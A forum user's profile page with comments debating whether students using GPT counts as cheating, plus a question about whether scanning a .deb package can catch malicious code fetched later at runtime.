• 0 Posts
  • 7 Comments
Joined 1 year ago
cake
Cake day: May 18th, 2024

help-circle
  • This is very insightful and provides good perspective.

    If I boil it down to take away is that GPT is enough to get through the fundamentals of student material, students can fake competence of the subject up to the cliff they fall off at the test.
    This ultimately isn’t preparing them for the world. It’s nearly impossible to catch until it’s too late. The pass or fail options aren’t helping because neither really represents the students best interests.

    The call to ban it for school is the only lever we can grasp for is because every other KNOWN option has been tried or assessed.


  • In some regard I don’t think it should be considered cheating. Don’t beat me up yet, I’m old and think AI sucks at most things.

    AI typically outputs crap. So why does this use of a new and widely available tech get called out differently?

    Using Google (in the don’t be evil timeframe) wasn’t cheating when open book was permitted. Using the text book was cheating on a closed book test. In some cases using a calculator was cheating.

    Is it cheating if you write a paper completely on your own and use spell check and grammar check within word? What if a grammarly type extension is used? It’s a slippery slope that advances with technology.

    I remember testing and assignments that were designed to make it harder to cheat, show your work, for math type approaches. Quizzes and short essays that make demonstration of the subject matter necessary.

    Why doesn’t the education environment adapt to this? For writing assignments, maybe they need to be submitted with revision history so the teacher can see it wasn’t all done in one go via an LLM.

    The quick answer responses are somewhat like using Wikipedia for a school paper. Don’t site Wikipedia and don’t use the generated text for anything but a base understanding of the topic. Now go use all the sources these provided, to actually do the assignment.




  • Does this work? I would think scanning a *.package would only assess that content. Wouldn’t something malicious likely be in the code or dependency it could call via some form of get request? That .deb package itself could be completely “safe” until it calls a git clone <URL> to then run something malicious.

    I think this would be more likely to work for appimage or flatpak, though the same approach could compromise the validity of the scan. Am I thinking too hard, or did I just miss the point?